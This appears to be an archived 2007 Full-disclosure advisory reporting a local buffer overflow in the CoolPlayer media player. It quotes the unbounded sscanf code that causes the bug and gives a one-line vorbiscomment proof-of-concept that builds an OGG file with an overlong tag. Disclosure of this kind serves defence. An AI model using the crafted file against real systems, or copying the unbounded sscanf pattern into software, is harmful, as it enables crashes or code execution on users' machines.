Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Buffer-overflow in CoolPlayer 217

from [Luigi Auriemma] Network Security [Permanent Link]
Subject: [Full-disclosure] Buffer-overflow in CoolPlayer 217
Date: Fri, 28 Dec 2007 19:17:13 +0100 

#######################################################################

                             Luigi Auriemma

Application:  CoolPlayer
              http://coolplayer.sourceforge.net
Versions:     <= 217
Platforms:    Windows
Bug:          buffer-overflow in CPLI_ReadTag_OGG
Exploitation: local
Date:         28 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


CoolPlayer is a tiny open source media player for Windows.


#######################################################################

======
2) Bug
======


The tags in the OGG Vorbis files are handled by the CPLI_ReadTag_OGG
function which uses sscanf for storing the tag's name and its value in
two stack buffers but the lack of size limiters in the format argument
results in a buffer-overflow.


From CPI_PlaylistItem.c:


void CPLI_ReadTag_OGG(CPs_PlaylistItem* pItem)
            ...
            char cTag[128];
            char cValue[2048];

            if(sscanf(pComment->user_comments[iCommentIDX], " %[^= ] = %[^=]", 
cTag, cValue) == 2)
            ...


#######################################################################

===========
3) The Code
===========


vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg


#######################################################################

======
4) Fix
======


The problem has been reported to the developers which have said that
will work on this and on any other old public bug.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Buffer-overflow in CoolPlayer 217, Luigi Auriemma <=
Previous by Date:  [SECURITY] [DSA 1441-1] New peercast packages fix arbitrary code execution, Thijs Kinkhorst
Next by Date:  [Full-disclosure] [ GLSA 200712-15 ] libexif: Multiple vulnerabilities, Pierre-Yves Rofes
Previous by Thread:  [SECURITY] [DSA 1441-1] New peercast packages fix arbitrary code execution, Thijs Kinkhorst
Next by Thread:  [Full-disclosure] [ GLSA 200712-15 ] libexif: Multiple vulnerabilities, Pierre-Yves Rofes
Indexes:  [Date] [Thread] [Top] [All Lists]